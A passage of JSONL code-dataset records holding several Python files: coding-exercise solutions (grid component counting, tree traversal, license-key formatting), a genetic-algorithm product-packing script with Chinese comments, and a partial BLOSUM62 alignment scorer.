stdout.write(prefix + \"\\033[0m[\\033[91;1m-\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n elif mode == 's': #SUCCESS\n stdout.write(prefix + \"\\033[0m[\\033[92;1m+\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n elif mode == 'w': #WARNING\n stdout.write(prefix + \"\\033[0m[\\033[93;1m*\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n elif mode == 'i': #INFORMATION\n stdout.write(prefix + \"\\033[0m[\\033[94;1m!\\033[0m] \\033[0m\" + message + \"\\033[0m\" + suffix)\n else:\n return\n stdout.flush()\n","sub_path":"PyPrintSystem.py","file_name":"PyPrintSystem.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143582837","text":"# https://www.acmicpc.net/problem/2667\n\nn = int(input())\n\n# 지도 입력\nmap = [list(map(int, input())) for _ in range(n)]\ncheck = [[0]*n for _ in range(n)]\n\n# 위, 아래, 왼쪽, 오른쪽 좌표 계산을 위해\ndistance_x = [-1, 1, 0, 0]\ndistance_y = [0, 0, -1, 1]\n\n\ndef dfs(x, y, complex_number):\n check[x][y] = complex_number\n for i in range(4):\n next_x = x + distance_x[i]\n next_y = y + distance_y[i]\n if 0 <= next_x < n and 0 <= next_y < n:\n if map[next_x][next_y] == 1 and check[next_x][next_y] == 0:\n dfs(next_x, next_y, complex_number)\n\n\ncomplex_number = 0\nfor i in range(n):\n for j in range(n):\n if map[i][j] == 1 and check[i][j] == 0:\n complex_number += 1\n dfs(i, j, complex_number)\n\nprint(complex_number)\n\n\nhouse_count = [0] * (complex_number+1)\nfor i in range(n):\n for j in range(n):\n if check[i][j] != 0:\n house_count[check[i][j]] += 1\n\nhouse_count.sort()\nfor i in range(1, len(house_count)):\n print(house_count[i])\n","sub_path":"Graph/complex_numbering.py","file_name":"complex_numbering.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528651291","text":"class Grid:\n\n\n def __init__(self, max_x, max_y):\n\n self.max_x = max_x\n self.max_y = max_y\n\n if max_x < 1:\n raise ValueError(f\"max_x must be greater than 0\")\n if max_y < 1:\n raise ValueError(f\"max_y must be greater than 0\")\n","sub_path":"jc/ihoover/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598255539","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def preorderTraversal(self, root: TreeNode) -> List[int]:\n if not root:\n return\n nodes = []\n res = []\n nodes.append(root)\n\n while len(nodes) > 0:\n curr = nodes.pop()\n res.append(curr.val)\n\n if curr.right != None:\n nodes.append(curr.right)\n\n if curr.left != None:\n nodes.append(curr.left)\n\n return res\n","sub_path":"Easy/Binary Tree Preorder Traversal.py","file_name":"Binary Tree Preorder Traversal.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418860545","text":"class Solution(object):\n def licenseKeyFormatting(self, S, K):\n \"\"\"\n :type S: str\n :type K: int\n :rtype: str\n \"\"\"\n S = S.split('-')\n S = ''.join(S).upper()\n res = []\n for i in range(len(S) // K):\n res.insert(0, S[len(S) - K * (i + 1): len(S) - K * i])\n if len(S) % K != 0:\n res.insert(0, S[:len(S) - K * (len(S) // K)])\n res = '-'.join(res)\n return 
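# --- Editor's note (hedged sketch) -------------------------------------
# PyPrintSystem.py above repeats one if/elif branch per mode in both i()
# and p(). The five branches collapse into a lookup table; this sketch
# keeps the [symbol] prefix format and colour codes but drops the dim
# styling the original gives verbose messages, so it is an approximation
# rather than a drop-in replacement.
from sys import stdout
from os import linesep

MODES = {  # mode -> (ANSI colour code, status symbol)
    'v': (90, '#'), 'e': (91, '-'), 's': (92, '+'),
    'w': (93, '*'), 'i': (94, '!'),
}

def p(message, mode='i', verbose=False, prefix="", suffix=linesep):
    if mode not in MODES or (mode == 'v' and not verbose):
        return
    colour, symbol = MODES[mode]
    stdout.write("%s\033[0m[\033[%d;1m%s\033[0m] \033[0m%s\033[0m%s"
                 % (prefix, colour, symbol, message, suffix))
    stdout.flush()
# -----------------------------------------------------------------------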
res\n","sub_path":"482.license-key-formatting.py","file_name":"482.license-key-formatting.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195178869","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom numba import vectorize, int64\nfrom numba import guvectorize, int64\nfrom numba import jit\nfrom pyculib import rand as curand\n#from numba import jit\nimport time\nimport pandas as pd\nimport random\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport copy\nimport os\nfrom numba import cuda\nos.chdir('D:/R.data/DSL_paper')\n\n#----時間紀錄(開始)----\nstartTime = time.time()\n\n#----資料初始化(本地端)----\nsourceData = pd.read_csv('assets_py/StoreData.csv') #讀取原始資料\npreferenceTable = pd.read_csv('assets_py/preferenceTable.csv') #讀取商品偏好表\nsourceData.drop(['序', '輸入格式(序,產品代碼+品名,單價,體積,種類)'], axis = 1, inplace=True) #移除不必要的資料欄位\nsourceData.rename(index=str, columns={\"重量(g)\": \"重量\"}, inplace=True) #重新命名欄位名稱\ngoodData = copy.copy(sourceData) #將原始資料複製一份\nsourceData = sourceData.values\n\ngoodData['Selected'], goodData['Preference'] = 0, 1 #新增被選擇欄位\ngoodData = goodData.values #轉換成ndarry型態\npreferenceTable = preferenceTable.values\n\n\n#----環境參數設定----\nmaxVolume = 47*32*39 #最大箱子體積\nmaxWeight = 16000 #最大重量(g)\npopAmount = 20 #人口數量\ncrossRate = 1 #交配率\nmutationRate = 1 #突變率\neliteValues = round(popAmount*0.1) #菁英數量\nmaxGen = 10000 #世代次數\n\n#----使用者需輸入的參數(假設)----\ndietHabit = '葷食' #葷食與素食的選擇\nuserItemValues = 22 #使用者需要的數量\nmaxPrice = 1500 #使用者金額\nexceptBrandList = np.array(['大同']) #將要剔除的品牌\n\n#----Function----\n#飲食習慣(葷或素食):\n#在開始演算法前先將該飲食習慣給加入\n#若為葷食則包含素食和葷食, 反之只有素食\n#@jit\ndef diet_select(good_data, diet_habit_list):\n #good_data: 原始商品資料集\n #diet_habit_list: 葷食或素食的選擇\n if diet_habit_list=='素食':\n good_data = good_data[good_data[:, 9] == diet_habit_list]\n return(good_data)\n\n#剔除品牌的方法:\n#在開始演算法前先將該品牌給移除\n#@jit\n@jit(nopython=True)\ndef except_brand(good_data, except_brand_list):\n #good_data: 原始商品資料集\n #except_brand_list: 剔除品牌的名稱\n for i in range(len(except_brand_list)):\n good_data = good_data[good_data[:, 4] != except_brand_list[i]] #將要剔除的廠牌移除\n return(good_data)\n\n#偏好值與類別合併:\n#將使用者對商品種類的偏好與原始商品資料進行合併成一個Data Frame, 使原始資料有使用者對每個商品的品項偏好\n#@vectorize(['int32(int32, int32)'], target='cuda')\n#@guvectorize(\"int64[:], int64\", \"(n) -> ()\")\n#@jit\ndef preference_match(good_data, preference_table):\n #gene_list: 被選擇出的基因清單\n #require_goods: 必要性的商品清單\n #non_require_goods: 不必要性的商品清單\n #user_preference: 使用者對商品種類的偏好\n for i in range(len(preference_table)):\n temp = good_data[good_data[:, 8] == preference_table[:,0][i]]\n for j in range(len(good_data[good_data[:, 8] == preference_table[:,0][i]])):\n temp[:, 12][j] = preference_table[:,1][i]\n good_data[good_data[:, 8] == preference_table[:,0][i]] = temp\n return(good_data)\n\n\n\n#@vectorize(['int64(int64, int64, int64, int64, int64)'], target='cuda')\n#@guvectorize([(int64[:], int64[:], int64[:], int64, int64)], '(n), (n), (n), (), ()')\n#@vectorize(['int64(int64[:], int64[:], int64[:], int64, int64)'], target='cuda')\n\ndef initial_pop(good_data, require_goods, non_require_goods, non_require_values, limit_weight):\n #good_data: 原始商品資料集\n #require_goods: 必要性的商品清單\n #non_require_goods: 不必要性的商品清單\n #non_require_values: 不必要性的商品數量\n #limit_weight: 最大重量限制\n while True:\n# temp_good = np.copy(good_data) #先將原始資料暫時給另外一個變數使用 \n temp_good = np.copy(good_data) #先將原始資料暫時給另外一個變數使用 \n for i in range(len(require_goods)):\n get_index = 
temp_good[(temp_good[:,8] == require_goods[i]) & (temp_good[:, 11] !=1)] #取得符合條件的資料\n temp_index = random.randint(0, (len(get_index)-1)) #隨機取得品項\n get_index = get_index[temp_index] #取得商品名稱\n get_index[11] = 1\n temp_good[temp_good[:,0] == get_index[0]] = get_index\n \n selected_require = np.random.choice(non_require_goods, non_require_values, replace=False)\n \n for i in range(len(selected_require)):\n get_index = temp_good[(temp_good[:,8] == selected_require[i]) & (temp_good[:, 11] !=1)] #取得符合條件的資料\n temp_index = random.randint(0, (len(get_index)-1)) #隨機取得品項\n get_index = get_index[temp_index] #取得商品名稱\n get_index[11] = 1\n temp_good[temp_good[:,0] == get_index[0]] = get_index\n\n selected_good = temp_good[temp_good[:, 11] == 1]\n sum_weight = np.sum(selected_good[:,10])\n if sum_weight <= limit_weight:\n break\n return(selected_good) #回傳結果\n\n#編碼染色體:\n#必要性商品必定方在最前段, 選擇性商品必定放在後段\n#@jit\ndef create_chromosome(gene_list):\n #gene_list: 被選擇出的基因清單\n for i in range(len(gene_list)):\n chromosome = (gene_list[i]['data.frame'][:,0]) \n gene_list[i]['chromosome'] = chromosome\n return(gene_list)\n\n#計算總重量\n#@jit\ndef total_weight(gene_list):\n #gene_list: 被選擇出的基因清單\n for i in range(len(gene_list)):\n sum_weight = np.sum(gene_list[i]['data.frame'][:,10])\n gene_list[i]['totalWeight'] = np.array([sum_weight])\n return(gene_list)\n\n#偏好的適應度方法(算式分母為偏好值1~偏好的最大值)\n#@jit\ndef fitness_preference(gene_list, require_goods, non_require_values, preference_table):\n #gene_list: 被選擇出的基因清單\n #require_goods: 必要性的商品清單\n #non_require_goods: 不必要性的商品清單\n #user_preference: 使用者對商品種類的偏好\n \n max_preference = np.max(preference_table[:,1])\n total_preference = 0\n for i in range(0, max_preference+1, 1):\n total_preference = total_preference+i**2\n \n for i in range(len(gene_list)):\n reuslt = 1\n for j in range((len(require_goods) + non_require_values)):\n temp_preferenced = 1+(((gene_list[i]['data.frame'][:,12][j]**2)-1) / total_preference)\n reuslt *=temp_preferenced\n #temp.append(reuslt)\n \n gene_list[i]['fitPreference'] = np.array([reuslt])\n sum_preferenced = (gene_list[i]['data.frame'][:,12]).sum()\n gene_list[i]['totalPreference'] = np.array([sum_preferenced])\n return(gene_list)\n\n#體積的適應度方法(已加入懲罰值)\n#@jit \ndef fitness_volume(gene_list, bin_volume):\n #gene_list: 被選擇出的基因清單\n #bin_volume: 箱子的乘積\n for i in range(len(gene_list)):\n sum_volume = np.sum(gene_list[i]['data.frame'][:,3]) #將最大限制體積減去每個基因的總體積\n subtraction_volume = bin_volume-sum_volume #容積上限與選擇商品之總體積的差額\n reuslt = abs(subtraction_volume)/bin_volume #將體積適應度算出\n \n if (sum_volume >=(bin_volume*0.7)) & (sum_volume <=bin_volume):\n if subtraction_volume==0:\n reuslt = reuslt + 1 #若適應度等於0就給予懲罰值1, e.g. 
(49795.2-27749.25)/49795.2=0.4427324, 愈接近0表示價格差距越小\n reuslt = reuslt + 2 #若適應度大於0就給予懲罰值2\n reuslt = reuslt + 3\n \n gene_list[i]['fitVolume'] = np.array([reuslt])\n return(gene_list)\n\n#價格的適應度方法(已加入懲罰值)\n#@jit\ndef fitness_price(gene_list, limit_price):\n #gene_list: 被選擇出的基因清單\n #limit_price: 價格最高限制\n for i in range(len(gene_list)):\n sum_price = np.sum(gene_list[i]['data.frame'][:,2]) #將最大限制金額減去每個基因的總金額\n subtraction_price = limit_price-sum_price #預算與商品組合之總價格的差額\n reuslt = abs(subtraction_price)/limit_price #將價格適應度算出\n \n if subtraction_price==0:\n reuslt = reuslt + 1\n elif subtraction_price>0:\n reuslt = reuslt + 2\n else:\n reuslt = reuslt + 3\n \n gene_list[i]['fitPrice'] = np.array([reuslt])\n gene_list[i]['totalPrice'] = np.array([sum_price])\n return(gene_list)\n\n#總體的適應度方法\n#@jit\ndef fitness_total(gene_list):\n #gene_list: 被選擇出的基因清單\n for i in range(len(gene_list)):\n sum_fit = gene_list[i]['fitPrice'][0]*gene_list[i]['fitVolume'][0]*gene_list[i]['fitPreference'][0]\n gene_list[i]['totalFit'] = np.array([sum_fit])\n return(gene_list)\n\n#選擇(競賽法):\n#從父母中隨機挑選出兩個染色體, 這兩染色體互相比較總適應度, 越低者獲勝, 將被複製至交配池中, 直至交配池內的數量與人口數相同\n#@jit\ndef selection(gene_list, pop_amount):\n #gene_list: 被選擇出的基因清單\n #pop_amount: 人口數量\n result = []\n for i in range(pop_amount):\n compare_list = random.sample(gene_list, 2)\n if compare_list[0]['totalFit'][0] < compare_list[1]['totalFit'][0]:\n result.append(compare_list[0])\n elif compare_list[0]['totalFit'][0] > compare_list[1]['totalFit'][0]:\n result.append(compare_list[1])\n else:\n result.append(random.sample(compare_list, 1))\n return(result)\n \n#選擇(競賽法)-2:\n#從父母中隨機挑選出兩個染色體, 這兩染色體互相比較總適應度, 越低者獲勝, 將被複製至交配池中\n#直至交配池內的數量與剩餘人口數(人口數-除菁英數量)相同\n#@jit \ndef selection_second(gene_list, pop_amount, elite_list):\n #gene_list: 被選擇出的基因清單\n #pop_amount: 人口數量\n #elite_list: 菁英清單\n result = []\n for i in range(pop_amount-len(elite_list)):\n compare_list = random.sample(gene_list, 2)\n if compare_list[0]['totalFit'][0] < compare_list[1]['totalFit'][0]:\n result.append(compare_list[0])\n elif compare_list[0]['totalFit'][0] > compare_list[1]['totalFit'][0]:\n result.append(compare_list[1])\n else:\n result.append(random.sample(compare_list, 1)[0])\n for i in range(len(elite_list)):\n result.append(elite_list[i])\n return(result) \n\n\n#交配(雙點交配)-需考慮適應函數值(包含懲罰值)、交配率和重量限制\ndef cross_over(good_data, gene_list, require_goods, non_require_values, cross_rate):\n get_chrom_length = len(require_goods)+non_require_values #取得染色體長度\n get_cross_index = [] #宣告一個放所有染色體index的陣列\n for j in range(len(gene_list)):\n get_cross_index.append(j) #把所有染色體的index放入\n \n for i in range(int(len(gene_list)/2)):\n get_index = random.sample(get_cross_index, 2) #抽取要被交配的基因\n rnd_cross_rate = round(random.random(), 3) #產生亂數\n if rnd_cross_rate<=cross_rate:\n divide_index = sorted(random.sample(range(0, get_chrom_length), 2)) #隨機選擇切割地方(採雙點交配)\n tempChrom_A = copy.deepcopy(gene_list[get_index[0]]) #先將染色體給暫時變數A\n tempChrom_B = copy.deepcopy(gene_list[get_index[1]]) #先將染色體給暫時變數B\n tempChrom_A['chromosome'][divide_index[0]:divide_index[1]] = copy.deepcopy(gene_list[get_index[1]]['chromosome'][divide_index[0]:divide_index[1]]) #開始進行交配, 將第二個基因切割的染色體給第一個基因\n tempChrom_B['chromosome'][divide_index[0]:divide_index[1]] = copy.deepcopy(gene_list[get_index[0]]['chromosome'][divide_index[0]:divide_index[1]]) #開始進行交配, 將第二個基因切割的染色體給第一個基因\n tempChrom_A['data.frame'][divide_index[0]:divide_index[1],:] = copy.deepcopy(gene_list[get_index[1]]['data.frame'][divide_index[0]:divide_index[1],:]) #開始進行交配, 將第二個基因切割的商品給第一個基因\n 
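# --- Editor's note (hedged sketch) -------------------------------------
# In the tie branch, selection() above appends random.sample(compare_list,
# 1) -- a one-element *list* -- into the result, while selection_second()
# correctly unwraps it with [0]. A tournament helper with the tie handled
# the same way for both call sites; `tournament_select` is hypothetical.
import random

def tournament_select(gene_list, n_winners):
    winners = []
    for _ in range(n_winners):
        a, b = random.sample(gene_list, 2)
        if a['totalFit'][0] < b['totalFit'][0]:
            winners.append(a)
        elif a['totalFit'][0] > b['totalFit'][0]:
            winners.append(b)
        else:
            winners.append(random.choice((a, b)))  # tie: append the dict itself
    return winners
# -----------------------------------------------------------------------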
tempChrom_B['data.frame'][divide_index[0]:divide_index[1],:] = copy.deepcopy(gene_list[get_index[0]]['data.frame'][divide_index[0]:divide_index[1],:]) #開始進行交配, 將第二個基因切割的商品給第一個基因\n tempChrom_A['totalWeight'] = np.sum(tempChrom_A['data.frame'][:,10]) #重新計算總重量\n tempChrom_B['totalWeight'] = np.sum(tempChrom_B['data.frame'][:,10]) #重新計算總重量\n \n tempChrom_A_length = len(tempChrom_A['data.frame']) #取得原始長度\n tempChrom_A_category = np.unique(tempChrom_A['data.frame'][:,8]) #取得所有不重複的種類\n \n for k in range(len(tempChrom_A_category)):\n duplicate_index = np.where(tempChrom_A['data.frame'][:,8] == tempChrom_A_category[k])[0] #取得每個相對應種類的index\n if len(duplicate_index) >= 2:\n tempChrom_A['data.frame'] = np.delete(tempChrom_A['data.frame'], duplicate_index[1:], axis = 0) #除了第一個商品不做刪除, 其餘皆刪除\n \n while len(tempChrom_A['data.frame']) < tempChrom_A_length:\n tempChrom_A_category = tempChrom_A['data.frame'][:,8] #抓出tempChrom_A中data frame的所有種類\n temp_df = copy.deepcopy(good_data) #將原始資料複製一份\n for j in range(len(tempChrom_A_category)):\n temp_df = temp_df[temp_df[:,8]!=tempChrom_A_category[j]] #挑出tempChrom_A中沒有的種類品項\n random_df_row = random.randint(0,(len(temp_df)-1)) #隨機取得沒有重複種類的品項\n random_df_row = temp_df[random_df_row]\n tempChrom_A['data.frame'] = np.vstack((tempChrom_A['data.frame'], random_df_row)) #將隨機取出的資料放入染色體中\n tempChrom_A['data.frame'].sort(axis=0) #將資料按照產品代號排序\n tempChrom_A['chromosome'] = tempChrom_A['data.frame'][:,0] #重新將染色體編碼\n \n \n tempChrom_B_length = len(tempChrom_B['data.frame']) #取得原始長度\n tempChrom_B_category = np.unique(tempChrom_B['data.frame'][:,8]) #取得所有不重複的種類\n \n for k in range(len(tempChrom_B_category)):\n duplicate_index = np.where(tempChrom_B['data.frame'][:,8] == tempChrom_B_category[k])[0] #取得每個相對應種類的index\n if len(duplicate_index) >= 2:\n tempChrom_B['data.frame'] = np.delete(tempChrom_B['data.frame'], duplicate_index[1:], axis = 0) #除了第一個商品不做刪除, 其餘皆刪除\n \n while len(tempChrom_B['data.frame']) < tempChrom_B_length:\n tempChrom_B_category = tempChrom_B['data.frame'][:,8] #抓出tempChrom_A中data frame的所有種類\n temp_df = copy.deepcopy(good_data) #將原始資料複製一份\n for j in range(len(tempChrom_B_category)):\n temp_df = temp_df[temp_df[:,8]!=tempChrom_B_category[j]] #挑出tempChrom_A中沒有的種類品項\n random_df_row = random.randint(0,(len(temp_df)-1)) #隨機取得沒有重複種類的品項\n random_df_row = temp_df[random_df_row]\n tempChrom_B['data.frame'] = np.vstack((tempChrom_B['data.frame'], random_df_row)) #將隨機取出的資料放入染色體中\n tempChrom_B['data.frame'].sort(axis=0) #將資料按照產品代號排序\n tempChrom_B['chromosome'] = tempChrom_B['data.frame'][:,0] #重新將染色體編碼\n \n gene_list[get_index[0]] = copy.copy(tempChrom_A) #將處理完畢的所有資料放回去\n gene_list[get_index[1]] = copy.copy(tempChrom_B) #將處理完畢的所有資料放回去\n get_cross_index.remove(get_index[0]) #刪除已交配完的染色體\n get_cross_index.remove(get_index[1]) #刪除已交配完的染色體\n else:\n get_cross_index.remove(get_index[0]) #刪除已交配完的染色體\n get_cross_index.remove(get_index[1]) #刪除已交配完的染色體\n return(gene_list)\n\n#突變方法, 加入重量限制(突變部分直接隨機突變非必選的商品)\n#@jit \ndef mutation_FN(good_data, gene_list, mutation_rate):\n #good_data: 商品資料集\n #gene_list: 已交配過的基因人口群\n #mutation_rate: 交配率\n for i in range(len(gene_list)):\n rnd_mutation_rate = round(random.random(), 3) #產生亂數\n mutation_index = random.randint(0,(len(gene_list[i]['data.frame'])-1)) #隨機取得要突變的位置\n mutation_data = gene_list[i]['data.frame'][mutation_index] #取得該品項資料\n mutation_id = mutation_data[0] #取得該資料的產品代號\n if rnd_mutation_rate <= mutation_rate:\n mutation_category = mutation_data[8] #取得染色體中要被突變的基因商品種類\n temp_df = goodData[(goodData[:,8]==mutation_category) & 
(goodData[:,0]!=mutation_id)]\n temp_index = random.randint(0,(len(temp_df)-1)) #從商品資料中隨機取得符合該基因突變的index(不包含自己)\n temp_good = temp_df[temp_index] #取得商品資料\n gene_list[i]['data.frame'][mutation_index] = temp_good #將品項更換程新品項\n gene_list[i]['totalWeight'] = np.sum(crossAfter[i]['data.frame'][:,10]) #重新計算總重量\n gene_list[i]['chromosome'] = gene_list[i]['data.frame'][:,0] #重新將染色體編碼\n return(gene_list)\n \n \n#氣泡排序法(遞增)\n#@jit\ndef bubble_sort_flag(gene_list):\n for i in range(len(gene_list)-1):\n flag = False\n for j in range(len(gene_list)-1-i):\n if gene_list[j]['totalFit'] > gene_list[j+1]['totalFit']:\n flag = True\n tmp = gene_list[j]\n gene_list[j] = gene_list[j+1]\n gene_list[j+1] = tmp\n if flag == False:\n break\n return(gene_list) \n\n\n#將符合體重的群組合併起來\n#@jit\ndef merge_population(first_gene, second_gene, limit_weight):\n new_pop = copy.deepcopy(first_gene) #將此代基因放入新的變數\n for i in range(len(second_gene)):\n new_pop.append(second_gene[i]) #將下代基因加入變數\n condition_pop = []\n for i in range(len(new_pop)):\n if new_pop[i]['totalWeight']<=limit_weight:\n condition_pop.append(new_pop[i])\n result_list = bubble_sort_flag(condition_pop)\n return(result_list)\n\n#將精英群挑選出來\n#@jit\ndef elite_population(merge_list, elite_pop):\n elite_list = merge_list[0:elite_pop]\n return(elite_list)\n\n#新的下一代, 須刪除屬於菁英的染色體, 並且抓取符合群組數量\n#@jit\ndef new_population(merge_list, elite_list, pop_amount):\n new_pop_list = merge_list[len(elite_list):(pop_amount+len(elite_list))] #刪除掉已經是屬於菁英的染色體\n return(new_pop_list)\n\n#更新菁英群組\n#@jit\ndef new_elite_population(old_elite_list, now_elite_list, elite_pop):\n for i in range(len(old_elite_list)):\n now_elite_list.append(old_elite_list[i]) #將舊的菁英與新的菁英合併\n now_elite_list = bubble_sort_flag(now_elite_list) #將菁英人口按照適應函數遞減排序\n new_elite = now_elite_list[0:elite_pop] #取得elite_pop(菁英數量)的成員\n return(new_elite)\n\n\n#----執行----\n#葷素的方法\ngoodData = diet_select(good_data = goodData, diet_habit_list = dietHabit)\n\n#剔除掉不想要的品牌\ngoodData = except_brand(good_data = goodData, except_brand_list = exceptBrandList)\n\n\nlevel = preferenceTable[:,0]\nrequiredList = level[0:6]\nnonRequiredList = (level[len(requiredList):len(level)])\nnonRequiredValues = userItemValues-len(requiredList) #選擇性商品的數量\n\ngoodData = preference_match(good_data = goodData, preference_table = preferenceTable)\n\n##基因演算法開始\n#產生初始口(遵照popAmount數量)\ngeneList = []\nfor i in range(popAmount):\n #geneList.append([])\n geneDict = {'data.frame': initial_pop(good_data = goodData, require_goods = requiredList, non_require_goods = nonRequiredList, non_require_values = nonRequiredValues, limit_weight = maxWeight)}\n #geneList[i].append(geneDict)\n geneList.append(geneDict)\n \n#編碼染色體\ngeneList = create_chromosome(gene_list = geneList)\n\n#計算每個基因總重量\ngeneList = total_weight(gene_list = geneList)\n\n#計算偏好適應度(目前僅計算總偏好值)\nfitnessPreference = fitness_preference(gene_list = geneList, require_goods = requiredList, non_require_values = nonRequiredValues, preference_table = preferenceTable)\n\n#計算體積適應度\nfitnessVolumeAfter = fitness_volume(gene_list = fitnessPreference, bin_volume = maxVolume)\n\n#計算價格適應度\nfitnessPriceAfter = fitness_price(gene_list = fitnessVolumeAfter, limit_price = maxPrice)\n\n#計算總體適應度\nfitnessTotalAfter = fitness_total(gene_list = fitnessPriceAfter)\n\n#選擇(競賽法)\nselectionAfter = selection(gene_list = fitnessTotalAfter, pop_amount = popAmount)\n\n#交配\ncrossAfter = cross_over(good_data = goodData, gene_list = selectionAfter, require_goods = requiredList, non_require_values = nonRequiredValues, cross_rate = 
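# --- Editor's note (hedged sketch) -------------------------------------
# Two details in the functions above: mutation_FN recomputes totalWeight
# from the *global* crossAfter instead of its gene_list argument (it
# should read gene_list[i]['data.frame'][:,10]), and merge_population
# sorts with a hand-rolled O(n^2) bubble sort. A sketch of the merge
# using the built-in sort, same ascending-totalFit order:
import copy

def merge_population(first_gene, second_gene, limit_weight):
    merged = copy.deepcopy(first_gene) + list(second_gene)
    feasible = [g for g in merged if g['totalWeight'] <= limit_weight]
    feasible.sort(key=lambda g: g['totalFit'][0])   # lowest (best) fitness first
    return feasible
# -----------------------------------------------------------------------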
crossRate)\n\n#突變\nmutationAfter = mutation_FN(good_data = goodData, gene_list = crossAfter, mutation_rate = mutationRate)\n\n#重新計算偏好適應函數, 體積適應函數, 價格適應函數\nmutationAfter = fitness_preference(gene_list = copy.deepcopy(mutationAfter), require_goods = requiredList, non_require_values = nonRequiredValues, preference_table = preferenceTable)\nmutationAfter = fitness_volume(gene_list = copy.deepcopy(mutationAfter), bin_volume = maxVolume) \nmutationAfter = fitness_price(gene_list = copy.deepcopy(mutationAfter), limit_price = maxPrice)\nmutationAfter = fitness_total(gene_list = copy.deepcopy(mutationAfter))\n\n#將父母代與孩子合併\nmergeList = merge_population(first_gene = fitnessTotalAfter, second_gene = mutationAfter, limit_weight = maxWeight)\n\n#此代的菁英群組\nlatestElite = elite_population(merge_list = mergeList, elite_pop = eliteValues)\n\n#新的下一代\nnewPopulation = new_population(merge_list = mergeList, elite_list = latestElite, pop_amount = popAmount)\n\ngen_values_best = [] #紀錄最好的基因總體適應函數\ngen_values_loss = [] #紀錄最差的基因總體適應函數\ngen_price_best = []\ngen_preference_best = []\n\ngen_values_best.append(latestElite[0]['totalFit'])\ngen_values_loss.append(newPopulation[popAmount-1]['totalFit']) #紀錄最差的總體適應函數\ngen_price_best.append(latestElite[0]['totalPrice']) #紀錄最佳的總價格\ngen_preference_best.append(latestElite[0]['totalPreference']) #紀錄最佳的總偏好\nprint((\"============第 {0} 代============\").format(1))\n\nfor i in range(1, maxGen):\n #選擇\n selectionAfter = selection_second(gene_list = newPopulation, pop_amount = popAmount, elite_list = latestElite)\n \n #交配\n crossAfter = cross_over(good_data = goodData, gene_list = selectionAfter, require_goods = requiredList, non_require_values = nonRequiredValues, cross_rate = crossRate)\n \n #突變\n mutationAfter = mutation_FN(good_data = goodData, gene_list = crossAfter, mutation_rate = mutationRate)\n \n #重新計算偏好適應函數, 體積適應函數, 價格適應函數\n mutationAfter = fitness_preference(gene_list = mutationAfter, require_goods = requiredList, non_require_values = nonRequiredValues, preference_table = preferenceTable)\n mutationAfter = fitness_volume(gene_list = mutationAfter, bin_volume = maxVolume) \n mutationAfter = fitness_price(gene_list = mutationAfter, limit_price = maxPrice)\n mutationAfter = fitness_total(gene_list = mutationAfter)\n \n #將父母代與孩子合併\n mergeList = merge_population(first_gene = newPopulation, second_gene = mutationAfter, limit_weight = maxWeight)\n \n #此代的菁英群組\n nowEliteLiet = elite_population(merge_list = mergeList, elite_pop = eliteValues)\n \n #更新舊代的菁英群組\n latestElite = new_elite_population(old_elite_list = latestElite, now_elite_list = nowEliteLiet, elite_pop = eliteValues)\n \n #下一代基因\n newPopulation = new_population(merge_list = mergeList, elite_list = latestElite, pop_amount = popAmount)\n \n gen_values_best.append(latestElite[0]['totalFit'][0])\n gen_values_loss.append(newPopulation[popAmount-1]['totalFit'][0]) #紀錄最差的總體適應函數\n gen_price_best.append(latestElite[0]['totalPrice'][0]) #紀錄最佳的總價格\n gen_preference_best.append(latestElite[0]['totalPreference'][0]) #紀錄最佳的總偏好\n print((\"============第 {0} 代============\").format(i+1))\n\nresultTime = time.time()-startTime\nprint('花費時間: {0} {1}'.format(resultTime, '秒'))\n\nplt.rcParams['font.sans-serif'] = ['Microsoft JhengHei'] \nplt.rcParams['axes.unicode_minus'] = False\nplt.style.use('bmh')\nplt.plot(gen_values_best, '-') #畫圖來顯示總體適應函數的起伏\nplt.title('裝箱演算法')\nplt.xlabel(\"世代數\")\nplt.ylabel(\"總體適應值\")\n\n\n\n\n\n\n\n\n\n\n#print(time.time() - 
startTime)","sub_path":"numpy_GA.py","file_name":"numpy_GA.py","file_ext":"py","file_size_in_byte":25722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244263491","text":"with open('BLOSUM62.txt', 'r+') as f:\n acids = f.readline().split()\n acidIndexDict = {acid : i for i, acid in enumerate(acids)}\n scoring_matrix = []\n for i, line in enumerate(f):\n scoring_matrix.append([int(x) for x in line.split()[1:]])\n\n\ndef getScoreValue(acid1, acid2):\n ind1 = acidIndexDict[acid1]\n ind2 = acidIndexDict[acid2]\n\n return scoring_matrix[ind1][ind2]\n\n\ndef initialize_linear_mat(s1, indelPen):\n dp_mat= [[0] * 2 for _ in range(len(s1) + 1)]\n for i in range(len(dp_mat)):\n dp_mat[i][1] = -(i*indelPen)\n\n return dp_mat\n\n\ndef LCSalignmentScore(s1, s2, indelPen):\n bt_dict = {0:'diag', 1:'right', 2:'down'}\n dp_mat = initialize_linear_mat(s1, indelPen)\n\n bt_mat = [''] * len(dp_mat)\n\n for j in range(len(s2)):\n for i, pair in enumerate(dp_mat):\n dp_mat[i][0] = pair[1]\n dp_mat[0][1] = dp_mat[0][0] - indelPen\n for i in range(1, len(dp_mat)):\n var = getScoreValue(s1[i-1], s2[j])\n values = [dp_mat[i-1][0] + var, dp_mat[i][0] - indelPen, dp_mat[i-1][1] - indelPen]\n dp_mat[i][1] = max(values)\n if j == len(s2) - 1:\n bt_mat[i] = bt_dict[values.index(dp_mat[i][1])]\n\n return dp_mat, bt_mat\n\n\ndef 